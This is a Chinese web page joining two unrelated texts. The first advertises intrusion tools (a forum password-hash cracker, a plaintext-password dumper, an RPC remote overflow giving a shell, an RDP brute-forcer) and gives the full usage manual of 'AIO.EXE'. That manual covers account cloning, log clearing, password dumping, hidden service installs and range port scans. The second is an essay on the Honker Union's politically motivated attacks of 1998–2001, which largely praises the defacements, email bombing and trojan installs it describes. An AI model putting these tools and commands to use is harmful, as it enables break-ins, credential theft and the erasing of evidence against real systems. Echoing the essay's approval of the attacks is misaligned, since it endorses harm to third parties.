Dvbbscrack破解DVBBS的十六位md5加密的密码(可以一次破解N个),速度一流! ftp 一个后台运行的ftp服务,有时派的上用场! Mstscxp 这是个winxp版的终端客户端,非常好用。如果对方3389改端口了,就输入IP:port连接 Passshow这个可以显示所有登录在线用户的明文密码,支持显示终端服务中的用户密码。* SkRPC_DCom通用的rpc远程溢出程序(支持中、英文win2k+sp0-sp4),成功后获得shell * find3389 一个通过win2k终端服务远程暴力破解用户密码的命令行程序,速度和准确性非常高!(900个 密码/每秒) * 11月19日 AIO.EXE 使用说明AIO.EXE 使用说明
AutoRun -> 查看一般登陆后启动的项 用法:Aio.exe -AutoRun 2.Clone -> 克隆帐户
用法: Aio.exe -Clone 正常帐号 要被克隆帐户 密码 例子: Aio.exe -Clone Administrator Guest test 帮助: Aio.exe -Clone 不需要在system权限下也可用 3.CheckClone -> 检测克隆帐户
用法: Aio.exe -CheckClone 不需要在system权限下也可用 4.CleanLog -> 清除日志
用法: Aio.exe -CleanLog 5.ConfigService -> 修改服务的启动类型
用法: Aio.exe -ConfigService 服务器 启动类型 例子: Aio.exe -ConfigService W3svc Demand ->手动启动 例子: Aio.exe -ConfigService W3svc Auto ->自动启动 例子: Aio.exe -ConfigService W3svc Disabled ->禁止启动 帮助: Aio.exe -ConfigService 6.DelUser -> 删除系统帐户
用法: Aio.exe -DelUser 帐户 例子: Aio.exe -DelUser Guest 帮助: Aio.exe -DelUser (注意: 可以删除系统内建帐号,象Administrator,Guest等,小心使用) 7.EnumService -> 列举系统服务
用法: Aio -EnumService All|Running|Stopped 例子: Aio -EnumService All -> 列举所有服务 例子: Aio -EnumService Running -> 列举正在运行的服务 例子: Aio -EnumService Stopped -> 列举停止了的服务 帮助: Aio -EnumService 8.FHS -> 检查系统隐藏服务
用法: Aio.exe -FHS 9.FGet -> FTP下载
用法: Aio.exe -FGet FTP地址 端口 用户名 密码 要下载文件名 例子: Aio.exe -FGet 12.12.12.12 21 test test a.exe 例子: Aio.exe -FGet 12.12.12.12 21 test test *.exe (下载所有exe文件) 帮助: Aio.exe -FGet 10.FindPassword -> 得到NT/2K所有登陆系统用户密码
用法: Aio.exe -FindPassword 11.InstallService -> 安装服务
用法: Aio.exe -InstallService 服务名 文件名 例子: Aio.exe -InstallService test test.exe 帮助: Aio.exe -InstallService 11.InstallService -> 安装驱动
用法: Aio.exe -InstallDrver 服务名 驱动文件名 例子: Aio.exe -InstallDriver test test.sys 帮助: Aio.exe -InstallDriver 12.KillTCP -> 杀掉一个TCP连接
用法: Aio.exe -KillTCP 本地IP 本地端口 远程地址 远程端口 例子: Aio.exe -KillTCP 192.168.1.1 80 61.61.61.61 7890 帮助: Aio.exe -KillTCP (参数可以通过netstat -an得到) 13.LogOff -> 注销系统
用法: Aio.exe -LogOff 14.MGet -> HTTP下载文件
用法: Aio.exe -MGet URL <保存为文件名> 例子: Aio.exe -MGet http://www.abc.com/test.exe abc.exe 帮助: Aio.exe -MGet 15.MPort -> 端口和程序关连映射
用法: Aio.exe -Mport 16.Never -> 将系统帐户登陆次数重置为0
用法: Aio.exe -Never 帐户 例子: Aio.exe -Never Guest 帮助: Aio.exe -Never 17.PowerOff -> 关机,关电源
用法: Aio.exe -PowerOff 18.Pslist -> 列进程
用法: Aio.exe -Pslist 19.Pskill -> 杀进程
用法: Aio.exe -Pskill PID|进程名 例子: Aio.exe -Pskill 3465 例子: Aio.exe -Pskill Iexplore 20.PortScan -> 端口扫描(Syn和TCP扫描)
用法: Aio.exe -PortScan Syn|TCP -S 起始地址 -E 终止地址 -P 端口列表 -T 线程数 </Banner> </TS> </S5> </Save> 例子: Aio.exe -PortScan Syn -S 61.129.1.1 -E 61.129.1.255 -P 3389 -T 512 /TS -> 扫描61.129.1.1到61.129.1.255的主机的3389端口,检查是否打开的是终端 例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /TS -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的终端服务 例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /S5 -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的Socks5服务 帮助: Aio.exe -PortScan (更多用法,请参考我发布的SynScan) 这个功能的用法是最多的,而且也是很强大的.(Syn扫描只适用于2K或以上系统) 21.PortRelay -> TCP数据转发 用法: Aio.exe -PortRelay 本地绑定端口 转发至的IP 转发至端口 例子: Aio.exe -PortRelay 3389 211.12.12.12 3389 帮助: Aio.exe -PortRelay 22.Reboot -> 重启系统
用法: Aio.exe -Reboot 23.RemoveService -> 删除服务
用法: Aio.exe -RemoveService 要删除的服务 例子: Aio.exe -RemoveService test 帮助: Aio.exe -RemoveService 24.StartService -> 启动服务
用法: Aio.exe -StartService 要启动的服务 例子: Aio.exe -StartService test 帮助: Aio.exe -StartService 25.StopService -> 停止服务
用法: Aio.exe -StopService 要停止的服务 例子: Aio.exe -StopService Test 帮助: Aio.exe -StopService 26.Sysinfo -> 查看系统信息
用法: Aio.exe -Sysinfo 27.ShutDown -> 关机
用法: Aio.exe -ShutDown 28.Terminal -> 安装终端服务(2K/XP/2003中都适用)
用法: Aio.exe -Terminal 端口 例子: Aio.exe -Terminal 3389 帮助: Aio.exe -Terminal 29.Unhide -> 查看星号密码(NT系统有效)
用法: Aio.exe -Unhide 30.WinInfo -> 查看帐户信息等 用法: Aio.exe -WinInfo <帐户> 例子: Aio.exe -WinInfo 例子: Aio.exe -WinInfo Guest 中国红客六次在感动世界!2004 年的最后一天,“中国红客联盟”( HUC )的核心人物 Lion 通过网站宣布“红客联盟解散,网站关闭”。 即日起,中国红客联盟网站在空白上的首页上仅呈现简单的一句话“ HUC is dismissed&****;** 2004/12/31 ”。 稍后,这一消息陆续出现在国内一些论坛,并延续到 2 月初,但只是产生小小的涟漪,并未产生较大的反响,也未见国内新闻媒体报道,倒是香港《文汇报》在 2 月 8 日做了一个重点报道,醒目的标题为《全国最大骇客组织解散》(说明:港台地区将“ hacker ”一词译作“骇客”)。 最初,“黑客”( hacker )【注 1 】是一个褒义词,指的是那些具有独创能力的编程人员,他们对任何*作系统都感兴趣,能够积极探寻出系统所存在的漏洞及其原因,同时找到解决的方法。然而今天“黑客”已是一个贬义词,主要指网络非法入侵者,即强行进入他人计算机信息系统,或恶意干扰对方工作,或从事窃取数据乃至破坏等违法犯罪活动的分子。用黑客自己的话来说,就是“强行撬锁( Picking ),未经许可侵入内部” 在黑客的行为中,有一种是出于政治目的而实施的“强行撬锁”,这种行为可以是个体实施的,也可以是群体实施的,可以是针对他国的,也可以是针对本国的。它是伴随激烈的国际国内政治冲突而发生的,反过来又会对冲突起到火上加油的作用。 在国际冲突中,以往传统媒体大都担负起宣传战的重要角色,互联网传播当然也具有同样的作用,然而互联网传播与传统媒体传播不同的是,它还可以成为发生冲突的国家间或敌对民族间互相攻击的工具。涂改网页、删改数据、堵塞访问通路、施放病毒等黑客攻击手段,是伴随国际冲突时最常见的状况,它已成为审视地区局势紧张与否国家关系好坏与否的晴雨表。出于政治目的实施的黑客攻击往往具有群体性、规模大、火力猛、持续时间长等特点。当然,一旦发生这种情况,双方的国家机器都会给予高度关注,并采取相应措施。 从 1998 年到 2001 年,中国黑客大规模的对外群体攻击共发生过六次。从理性的角度说,一切黑客攻击行为都应受到谴责;但从感性的角度看,中国黑客的这六次攻击都事出有因,强烈地表现出“人不犯我,我不犯人;人若犯我,我必犯人”。中国黑客是中国互联网上第一批产生了重大影响的“客”群体,而这种影响正是在出于政治目的对外实施大规模群体攻击的六次行动中产生的。当年这群充满激情和钻研精神的年轻人,不仅以自己掌握的技术手段维护祖国尊严,更重要的是,在中国互联网刚刚兴起之际,带动了国内网络安全概念的树立和相关技术的发展。 在中国红客联盟宣布解散之际,我将自己尚未出版的著作中的某章第二节(未定稿)首先在网上发表(由于篇幅有限,仅提供 10 幅截屏图),谨以此文献给具有正义感和充满激情的中国黑客。 第二节 中国黑客曾以“红客”给自己冠名,一时成为爱国主义、民族主义的集中体现 中国大陆黑客对外发起大规模的群体攻击,先后发生过六次:第一次在 1998 年 8 月,起因为印度尼西亚在暴乱事件中凌虐华人妇女侵害华人利益;第二次在 1999 年 5 月,起因为以美国为首的北约空军用导弹袭击中国驻南联盟大使馆并造成三名中国记者死亡;第三次在 1999 年 7 月,起因为李登辉抛出“两国论”公然挑战“一个中国”的原则;第四次在 2000 年 1 月,起因为日本右翼在大阪集会否定南京大屠杀;第五次在 2001 年 2 、 3 月间,起因为中日两国关系间的一系列摩擦,如三菱车事件【注 2 】、日航事件【注 3 】、教科书事件【注 4 】、《台湾论》事件【注 5 】、小泉参拜靖国神社【注 6 】等;第六次在 2001 年 4 月,起因为美国 EP3 侦察机在南海上空与中国战斗机相撞导致飞行员王伟死亡。从这六次攻击看,中国黑客都是在当时政治事件的大背景下,基于爱国主义和民族主义情怀的一种必然反应。 第一次: 1998 年 8 月攻击印尼网络 1998 年 5 月,印度尼西亚发生动乱。在此期间,大批华人受到迫害,华人妇女遭到令人发指的强暴。至 7 、 8 月,事件真相才通过互联网陆续透漏出来。在国内新闻媒体不报道此事的情况下,中国网民通过互联网陆续获得了相关信息。 8 月初,全球华人社会形成抗议高潮, 8 月 7 日,世界各地华人更同步举行抗议示威。印尼暴徒的行为激怒了刚刚学会蹒跚走步的中国黑客们,他们不约而同聚集在聊天室( IRC )中,讨论并决定对向印尼网站攻击。这是中国黑客的第一次对外群体性攻击行动,其表现出的团结与协调成为今后类似攻击行动的典范。 8 月 7 日 , ChinaByte 责任编辑在网站论坛中发现一个新帖。这一“帖子”声称中国黑客袭击了印尼站点,同时附上了尚未恢复原貌的站点网址。编辑印证后当即决定立即在每日发送给订户的新闻邮件中,首次增发“号外”。“号外”中只有简单两句话及一个网址,但包含了这一新闻事件的核心信息。全文为:“你的站点已被来自中国的‘黑客’所 ‘黑’,印尼的暴徒你们的暴行是会有报应的!!!(中文)’‘停止屠杀华人!!!’(英文)这是印尼一个‘ to kobudi.co.id ’的站点上日前出现的文字。这一站点目前被中国黑客小组所‘黑’。” 这一“号外”几分钟里就发送到数万订户的邮箱中。 8 月 10 日 , ChinaByte 更将相关新闻上了主页头条。标题赫然为:印尼排华暴行激怒中国黑客。副题为:网上怒潮连天起。 实际上,早在 8 月 7 日之前,中国黑客已对印尼网站和电子邮箱展开攻击行动。他们通过破解密码而拥有了系统管理员的权利,将“苦难的同胞,我为你悲愤哭泣!”、“严惩暴徒!严惩凶手!血债血还!”等口号写在了印尼网站的首页上。他们同时还提供大量印尼重要部门的电子信箱,并向网友提供如何“轰炸”这些电子信箱的方法。 8 月 17 日是印尼国庆日,这一天众多印尼网站再次遭到黑客的攻击,被黑网站首页都留有黑客们用不太连贯的英文以及中文声讨印尼排华暴行的词句。其中一名署名“ Warning From Chinese ”的黑客,在被黑的页面上留言道,他这样做只是提醒人们不要忘记5月间发生的惨案,此举并不会造成该网站数据的丢失,但警告系统管理员必须将被黑页面保留 48 小时。这名黑客显然是为了让大家记住那场持续了 48 小时的排华暴乱。 中国黑客的攻击引起印尼政府强烈的反应,他们将中国民间黑客的行为指责为中国政府的怂恿,并指出是中国谋求地区霸权的强烈信号。据当时“美国之音” 8 月 9 日报道,印尼一名政府官员今日抗议“中国黑客”的“暴行”,据他说在 8 月 7 日以来,印尼至少有十余个互联网站,被自称“中国黑客”的组织摧毁,少数被贴上各种恐怖的图片,大部分被彻底破坏。另外 8 月 7 日几乎所有的印尼政府公用邮箱均遭到了邮件炸弹的疯狂轰炸。该官员竟说:“我们希望中国人保持理智,因为前一阶段的事情是我们自己的事情!如果中国人不想分清华人和中国人的区别,那就说明中国是一个充满威胁的国家,中国不能把有华人的地方都看作他的领土。五十年代中国派来了军舰,我们可以理解,因为他们接走的是自己国家的人,今天中国黑客来了,我们迷惑,因为他们对我们自己的事情横加干涉。谁都知道,没有中国政府的授意,中国妇联是不会抗议的,中国政府不仅干涉我们的内政,而且挑唆国内黑客对我们的攻击。我们十分不满!” 8 月 11 日,印尼政府电子技术主管官员就中国黑客行为再度发言。他说:“虽然黑客攻击给印尼造成了很大的损失,但他表示对民间的激愤他表示理解。但,印尼的问题是否象宣传的那样严重,大可不必听信过于危言耸听的报道。印尼政府会把自己的问题处理好。在被问及黑客攻击的损失时,他说有上百个个网站被攻击,其中十几个被侵入,大部分遭到破坏,有黑客试图攻击金融系统,造成了一定损失。另外 8 月 7 日当天,印尼的网络异常拥挤,当天的政府邮件系统几乎瘫痪,给印尼的正常社会秩序造成了一定影响。但这位发言人话题一转,再次耸人听闻地说道:“完全有把握说,中国的大量 ISP 凭借带宽的优势对我们进行了长达 30 个小时的邮件轰炸,我们很难说这不是有组织的行动。如果不是防空警报没响,我一定以为中国对我们宣战了。不过,谁的网络都有漏洞,任何民族都有黑客,我们不希望这是两个伟大民族仇恨的开端。我过去不相信中国威胁,现在我知道了不该听信中国政府口头上的什么政策,仅仅是他的十亿公民在政府偷偷怂恿下发泄一下不满,就是一种可怕的力量。”他最后说:“我敢打赌,黑客事件仅仅是中国人对他们地区称霸的一个信号,当他们踏上我们的国土,开始说三道四时,大家就会觉得‘中国威胁’多么贴切,东盟的朋友,应该首先记住!” 第二次: 1999 年 5 月攻击美国网络 在 1999 年科索沃战争初期,中国黑客并没有对美国及北约国家网站采取太多的过激行为。然而,当中国驻南联盟大使馆遭到导弹攻击后,形势陡然大变。中国网民立刻在网上掀起了抗议浪潮,其声势决不亚于中国大学生和中国民众在美国驻华使领馆门前举行抗议活动的声势。与此同时,中国黑客无法忍受同胞被害、使馆被炸、民族尊严遭到侵犯,对美国及北约的政府、军事站点展开了持续多日的猛烈攻击。与对印尼网站攻击相比,结果是一呼百应,使攻击的规模和战果远远超过第一次,美国驻华使馆、白宫及美国和北约的众多网站或首页内容被改,或系统彻底瘫痪。 5 月 8 日 ,当广大网友通过各种途径陆续获得我使馆被炸后,犹如听到了警报,立刻纷纷上网。一位署名“九大王”的网友,于 5 月 11 日贴出的一则的贴子《网络人民战争——网上抗美风潮亲历记》,生动地描绘了当时网上的情况,他最后写道:“这是一场真正的网(络)人(民)战争:在聊天室、在论坛,广大的网友们十指加键盘,与形形色色的汉奸、台独分子和其他仇视中国的人们做斗争;在后方,很多人在自己的主页上迅速加入抗议北约暴行的文字和图片,组成反北约站线联盟,他们的 ICQ 、 FrongPage 、 CUTEFTP ……一直开着,随时从战友那里得到最新情报,随时更新、上传;战斗在最前线的是特种兵——中国的黑客们,他们在最危险的地方进行着特殊的战斗……以上是我 5 月 8 日 夜及 9 日凌晨的网上亲历,从 8 日早晨上午 9 点到次日早晨将近 24 个小时里,其间我只吃了一顿午饭。 9 日 8 点以后的事不再记述,有消息说美国有 300 多个站点在 5 月 9 日 被黑。 1999 年 5 月 8 日的夜晚,对无数中国网民来说,都将是一个难以忘怀的夜晚,同样是一个百年难遇的不眠之夜。自世界上有互联网以来,从来没有一次能象这次一样能影响一个民族的情绪,虽然是对着计算机屏幕,但我能感觉到网友们那一颗颗拳拳爱国之心。我们感觉到所有的人都聚集在网络这一特殊的时空里,那种心情难以言表。” 众多网民及黑客在近一周的日子里,在夜里两三点甚至到凌晨四五点向其他网友道声“撑不住了”才下网,实在是司空见惯。 白宫首页从 5 月 8 日晚起便遭到多次修理,现在国内有的个人主页至少保存有四个被黑的不同版本。其中最精彩的一个版本是白宫主页上的两面星条旗被换成了海盗骷髅旗,中间白宫图片中白宫顶上的星条旗也被换成了骷髅旗。在对白宫网站攻击的行动中,来自香港的黑客也大显身手。短短几天内,中国黑客将三位遇难记者的遗像或强烈抗议的字句或纳粹克林顿的图片贴到了数百个美国政府、军队及驻华大使馆乃至北约的网站上。国内不少网站不断公布美国政府机构和军事机构的网址,如“中国龙”网站汇集了美国空军的大量网址,其中特别提到:“据调查,执行此次对我驻南使馆轰炸任务的是驻 Missouri Whiteman Air Force Base 的第 509th Bomb Wing 。即 B-2 空军基地。其网址是……(此处略),希望能有黑客高手前往狂轰滥炸。全体中国人民感谢您!!! ”网上不时传来报捷的消息。 5 月 12 日下午 3 点左右,一位署名“老游击队员”的网友报告:“最新消息!美国空军一网站被中国黑客攻破!”原来一位“福建龙岩”署名“中国天行”的黑客,将朱颖父亲致克林顿的信(中英文)贴到了代表美国空军最高荣誉的“雷鸟”飞行表演大队的网页上。他留言到:“出于尊敬之缘故,没有完全修理原有网页,仅借半屏空间发表我烈士父亲给贵国总统的信,以表示对美国和美国空军最强烈的抗议。” 在此次黑客攻击行动中,不仅有天马行空的独行侠,更有众人组成黑客兵团形成超强战斗力。 5 月 9 日,一个名为“中国黑客紧急会议中心”的组织应运而生,它们在网页上公布了美国 250 多个网站的密码(仅是他们知道的极小部份),立即引起国内众多网友去攻击这些站点。该组织声称:“这仅是一个临时组织,成员来自中国各地。我们成立的原因是——北约的无理野蛮的挑衅,我们成立的目的——抗议,打破外国敌对新闻机构的新闻封锁,让世人都能看清楚美国和北约的霸权心态和禽兽行为。我们没有严密的分工和行动规则,我们甚至互不认识,但我们团结一心。我们坚决拥护中国政府和中国G.C.D的主张。我们不会在行动中留下任何证据。请公安部门放心,我们只是用自己代表全中国人民的心声的页面去替换北约军事站点的首页,我们不会删除或破坏他们的任何数据。只要中国人民和中国政府的最终目的全面地无条件地一达到,我们自然解散。但是,现在,我们在行动!”该组织于 5 月 16 日早 8 点发起了发起第三轮攻击,先后将美国海军海军与华盛顿通信中心( BASS )等多个军队站点的主页进行了彻底修理。 为了让更多的网友立刻掌握攻击手法,一时间网上布满了黑客技法速成。除了黑客高手修理美国网站的首页外,另一个克敌的手段便是使用“拼”( PING )即电子邮件炸弹捣毁对方的服务器。那几天,网上经常可见“让我们团结起来,邮件导弹就是我们的进攻武器,如果数十万人一起这么干的话会很快使该网站瘫痪”的号召;可见教授“拼”方法的具体设置步骤;可见发起总攻的时间表。这一群起而攻之的简单手段,由于广大网友的踊跃掌握并同时运用,产生了极大的杀伤力。 5 月 12 日 ,“美国之音”的中文电子邮件新闻报道说:“中国的抗议群众除了在中国各地发动抗议之外 , 还直接向美国白宫发出了大量表达不满的电子邮件。电子邮件数目之庞大,甚至在星期一使得白宫网站故障,不得不暂时关闭进行修复。白宫发言人表示,星期一傍晚,白宫实习生发现无法连上白宫的网站,白宫电脑部门人员才发现,电子邮件的数量庞大使得白宫网站不堪负荷而关闭,一直到星期二晚间才完全修复。这位发言人表示,这是白宫网站第一次因为大量电子邮件而造成故障。” 在中国驻南斯拉夫大使馆于北京时间 1999 年 5 月 8 日凌晨 遭北约轰炸后不到 12 个小时,美国驻中国大使馆网站即遭到中国黑客的攻击。 广大网友看到被黑的美国网页后,立刻给予最热烈的掌声和欢呼声鼓励,纷纷留言:“怀着激动的心情向黑客们致敬!”“向黑侠们问声:辛苦了!”“我太佩服和尊敬黑客了!谁在关键时候为民族尽力,谁就是英雄!”。有的将“黑客”称为“红客”,赋予其革命正义的色彩。有的网友迫不及待要拜师学艺,表示“请热爱、拥护祖国的黑客马上传授‘黑’美国佬的方法给本人,并且希望可以同时收我为徒,令我日后也可以为祖国作出贡献”,而立刻也有人跟着表示“算我一个,我M昨天就说我:玩了几年计算机,到报效祖国的时候了。” . “中国黑客紧急会议中心”网页于 5 月 17 日 推出网上民意调查“你对近期中国黑客的行动的看法”,到 20 日晚 11 点共有 717 人表示了自己的态度:① 绝对支持,我想加入行动(占 81% );②支持,但不会加入行动(占 13% );③基本支持,但在细节上有些意见(占 3% );④无所谓(占 0% );⑤我觉得这样不太好(占 0% );⑥绝对反对(占 1% )。尽管目前的网上调查不具有统计学层面的科学性与规范性,但毕竟可以利用网络的互动功能最快地了解部分特定社会群体的看法和意向。对于黑客的此次行动,连很多报纸也给予了正面肯定,在报道中称他们是“网络战士”,“网络勇士”,某报纸报道的一个段落标题是:“网络勇士们在这一特定历史时刻,成了比特时代的英雄”。 红色在中国即意味着革命,也体现着胜利。在这次中国黑客对美国网络进行攻击中,为了更突显攻击的正义性,“红客”成为出于政治目的进行攻击的中国黑客的外包装。作为攻击主力的“中国红客网络安全技术联盟”( H.U.C , Honker Union of China )明确提出:应统一“红客”一词的英文名称( honker )。他们认为:“英文是通行全球的世界语言,‘红客’一词若能在英文中占有一席之地,这将具有非同寻常的意义!这样红客在世界范围内的交流与应用将变得更加方便;更重要的是,这样做能扩大影响力,增强凝聚力,促进红客文化的形成和进一步的发展。”他们明确提出“红客”的宗旨是:“维护祖国统一,捍卫国家主权”、“一致抵抗外辱,打击反华气焰”、“打击日右,美帝,台独,以及一切敌视我们国家的敌对分子。” 第三次: 1999 年 8 月攻击台湾网络 1999 年 7 月 9 日,李登辉在接受“德国之声”专访时,所提出了所谓“两国论”。公然宣称,台湾当局将两岸关系定位在“国家与国家,至少是特殊的国与国的关系”。台湾当局有关负责人也随声附和,说两岸关系已从“两个对等政治实体”走到“两个国家”,两岸会谈就是“国与国的会谈”等等。台湾当局这些分裂祖国的言论将他们一贯蓄意分裂中国领土和主权、制造“两个中国”、“一中一台”、“台湾独立”的意图暴露无遗。“两国论”顿时导致两岸局势紧张。大陆黑客依靠刚刚对美网络攻击战中总结出的经验,从 8 月 7 日 开始攻击台湾十多个政府网站,台湾黑客随即于 8 月 8 日展开反击,大陆黑客贴“世界上只有一个中国,世界只需要一个中国”,台湾黑客贴“台湾是中国永远分割的一部分”、“你们敢打,我们敢独;大陆黑客贴五星红旗,台湾黑客贴青天白日旗,一时间“山雨欲来风满楼”。香港、台湾报刊纷纷以“两岸黑客狂掀网络战”、“网络大战方兴未艾”、“网络开战:免不了的一场战争”为题,大肆进行报道:“台海两岸军队尚在隔海威吓,按兵观望,民间却已经先行拉开电脑资讯大战的序幕,双方电脑黑客互相攻击对方网站并张贴政治口号,展现实力。” 在大陆黑客的攻击中,台湾“行政院”、“国安局”、“新闻局”、“监察院”、“国民大会”等网站均被攻克。台湾方面指,仅对“国安局”的攻击 3 天内就达 7200 次。大陆黑客除删改网页外,还给许多台湾服务器安装了木马程序,导致不少网站服务器长时间瘫痪。值得一提的是,此次安装的木马程序由美国的 BO 首次改为了大陆黑客自己研发的“冰河”与 NetSpy ,而“木马冰河”也成了大陆黑客最为钟爱的木马程序。 8 月 11 日,台湾“国民大会”网站报警称,网站软、硬件疑遭黑客攻击造成严重毁损,即使是重灌系统也无法恢复。而警方对黑客仅利用软件就可破坏硬件,大感惊讶。在台湾黑客的第一波的反击下,铁道部、中国证监会、陕西科技信息网、浙江平阳国税局网站等篡改网页。随着两岸黑客对攻战规模的发展,大量的非政府网站开始被殃及。参与者非理性的成分越来越大,只要是“黑”下一个对方网站,就被视为胜利战果。这种情况是出于政治目的而实施的黑客攻击最普遍的现象,已超出少数真正意义上的黑客的行径。一直到八月底,两岸的黑客战才暂告一段。后来,台湾黑客扬言要在 十月一日当天大举进攻大陆网站,而大陆黑客则针锋相对地表示,如果这样,将在是 十月十日 坚决反击。 中国大陆黑客与台湾黑客的互攻是一场“持久战”,但凡碰到刺激事件就会引发攻击。如 2000 年 3 月 18 日台湾“大选”结束陈水扁上台的当晚,一些大陆黑客当即进行攻击行动。以下是名叫“天语”的一名黑客的自白:“本人天语,浙江人氏,现外出打工,月薪 800 元人民币,虽不穷困也不不富有,刚好穿暖吃饱,平民 - *民 - 贱民一个,连正规的高中都还尚未读过!此次对台湾的几个站点页面修改纯属发自一时气愤!要分裂我中国,我想每一个中国人对这个观点上的态度和我都该是一样的!尔等现正对我中国站点进攻,昨天竟还有一个“可爱的”所谓的“黑客”竟对我的个人电脑挂带的 HTTPD 产生了兴趣。呵呵。。其 IP 来自 140.123.107.78 。在此想也不用本人来说尔等对我方的进攻之密集!本人现警告之!本人原已停止对台主机的破解,但听闻尔等竟然反攻,并破坏我国几个站点。本人忍耐有限,于昨晚进入尔等国防部的主机。本打算来个 deltree/y c:\ 但想此举必将引起黑客大战!顾及大家皆无利可图,本人最后退出 TELNET 进程并关闭端口,可能也顺手关了 80 端口 , (纯属水平太差!:))现公布屏捕图!望尔等也能息事宁人!!”正是这名“天语”和其他黑客攻陷了台湾“国防部”等多个网站。 2004 年台湾“大选”后,台湾情治部门透露, 3 · 20 “大选”刚结束不久,大陆黑客竟突破重重防火墙,侵入“总统府”和“国安会”内部网络系统,窃取并下载机密文件。近年来,台湾媒体屡屡报道“大陆网军入侵台湾”。两岸长期僵持的局面,决定了两岸黑客互相攻击的长期态势。 第四次: 2000 年 1~2 月攻击日本网络 2000 年 1 月 21 日 ,日本最高法院无视历史事实,悍然判决参加过当年南京大屠杀的老兵东史郎见证大屠杀的诉讼败诉; 1 月 23 日,右翼势力在大阪国际和平中心集会,公然否定南京大屠杀的历史事实。这再次激起中国黑客的民族主义情绪,明确提出要进行一场网上的“新抗日战争”,发动了对日本网站的攻击。被篡改的日本网页上出现的文字如“不肯正视历史真相的日本人是亚洲之耻”明显表现出此次攻击的政治性。 在这次攻击中,有一个自称“中国极右翼抗日联盟”(其当时设立的网站网址为: http://www.bsptt.gx.cn/public/badboy/hack/ )的黑客组织最为显眼,从 1 月 24 日 到 2 月 13 日 ,他们对大约 30 个日本网站发动攻击,其中包括日本政府科技厅、总务厅及《每日新闻》, NHK 、冲绳邮政总局、 JVC 公司等各类网站。该联盟网站张贴了极刺激的《致日本政府的公开信》,并表明联盟宗旨是“对日本少数疯狗在网络里进行猛烈的打击”,联盟组成是“一切具有强烈爱国心的中国网虫”。该联盟网页上还提供了 300 多个日本政府的网址、 100 多名日本议员的电子邮件地址及十几种最有效的黑客进攻工具,并附有详细说明如何进攻日本网站。 2 月 18 日 ,《电脑报》记者通过 ICQ 采访了一位自称进行攻击的名为“ ROOT ”的黑客,并对他进行了技术甄别,确认他具有攻击日本网站的能力。 ROOT 承认,日本总务厅、统计厅、科技厅等网站的瘫痪都是他所为(后据日本共同社报道,日本警视厅在调查黑客入侵事件中所得资料显示的时间,与自称攻击网站的黑客 ROOT 所讲述的入侵时间一致,且入侵时使用的服务器也和总务厅的一致)。他说,发动对日本网站的攻击,是因为不满日本极右翼势力在大阪集会否定南京大屠杀等历史事实。“所有一切都是我一人所为,我认为对付小日本我一个人就够了。我只觉得做了一件中国人应该做的事情,换成其他人也会这样做。”当记者问他以后是否还会采取类似行动时, ROOT 表示如有必要,还会照做。他说要日本政府和传媒不要低估这次行动,以为只是一种“恶意行为”,“我希望他们能把此事与大阪事件联系起来,给日本鬼子一个警告”。日本各大报刊、电视台均将中国黑客的攻击事件列为头条新闻,并进行追踪报道。 第五次: 2001 年攻击日本网络 跨入新的世纪后之后,三菱车事件、日航事件、教科书事件、《台湾论》事件、小泉参拜靖国神社等一系列事件严重影响了中日友好关系。伴随这些事件,一再被激怒的中国黑客,持续地对日本网站进行了攻击。日本政府官员当时不得不承认,由于抗议者越来越喜欢通过互联网发泄不满,使日本网站受到政治动机袭击的事件急速增加, 2001 年前五个月已出现 650 起类似的网站被黑事件,而 2000 年一年仅发生了 63 起以政治为目的的黑客攻击事件。 首先是 2 月的攻击波。“中国红客网络安全技术联盟”( H.U.C )宣布, 2001 年 2 月 16 日 18 点开始对日本施行一个星期的攻击行动,包括政府网站、大型网站和其他重要的网站、重要 dns 系统。在随后的 10 多天中,日本 70 多家企业的网站表示被中国黑客侵入。这些企业遍及日本全国,多属民间企业,包括著名的日本电信公司 NTT 、西日本印刷公司大日本印刷,日本精工的一家子公司、日本短波广播等。被黑客篡改后的网页,大都更换成了中国国旗。 由于教科书事件紧随而来的是三月攻击波。这次日本网站面临的是中国、韩国两国黑客攻击。如当时日本教育省、文化省、体育及科技省的官方网站遭到来自韩国的黑客攻击而不得不关闭,最终日本政府不得不出面敦促韩国政府采取措施阻止黑客再次进行攻击。 在小泉 8 月 13 日 参拜靖国神社后, 8 月的攻击波来得更为猛烈。中国的黑客在获悉新闻后,即刻采取行动,更换了部分日本政府站点的主页内容,以示抗议。中国黑客组织在声明中表示:小泉参拜靖国神社的举动严重伤害了亚洲各国人民尤其是中国人民的感情,加之此前的教科书事件等,令他们非常愤怒,为此,决定用攻击日本政府网站的方式,表达他们的强烈不满。其实,中国红客大联盟早已讨论,一旦 8 月 15 日小泉参拜,将对日本网络采取何种攻击行动,没想到小泉提早参拜,因此红客大联盟成员也提前行动。 8 月 13 日 当天下午 4 时许,日本气象厅网站服务器首先受到中国黑客的攻击,其后,日本物质评估研究机构、日本战略物质研究中心、日本防御系统研究会、日本情报大会服务中心、日本消防厅、日本防卫设施厅、日本通讯研究实验室、日本议员网站等大批政府站点也受到攻击。 8 月 14 日凌晨,红客大联盟发出了《对日本采取网络打击的声明》,内中写道:“日本首相小泉不顾全亚洲人民的抗议和日本国内祈求和平的声音,于昨日下午公然参拜了象征日本军国主义的靖国神社。日本领导人的这一错误举动严重地伤害了亚洲各国人民,尤其是受害最深的中国人民的感受。加之教科书事件等斑斑劣迹更是体现出日本当局对当年的错误毫无悔改之意。红客大联盟在得到此消息的的第一时间便召集了部分成员对此突发事件商讨对策。最终决定在我国政府还没有对日本提出抗议之前用我们所擅长的,表达我们网络时代青年一群对日本新政府的严正抗议和日本领导人的强烈不满。红客大联盟 ( http://www.RedHacker.org ) 在此次紧急行动中对以下的日本政府站点进行了主页替换。这和我们致力于推行的红客精神并不矛盾。红客大联盟对此件事情的发生表示遗憾,并将对以下所列举的受到的攻击的站点负责。历史不容忽视,事实岂能篡改,反击方能赢尊重,发展才是硬道理!” 第六次: 2001 年 4 月攻击美国网络 2001 年 4 月 1 日,美国军用侦察机将中国战机撞毁,导致飞行员王伟坠海死亡。这一事件在中国国内引起民众极大的愤慨,而在中美之间立刻造成布什新政府与中国关系紧张的局面。尽管 4 月 11 日 ,中国方面已同意美方机组人员先行返国,但事件尚未得到完全解决,两国间的气氛依旧剑拔弩张。从 4 月初开始,中美两国的黑客已经展开相互攻击。如美国黑客组织 poizonB0x 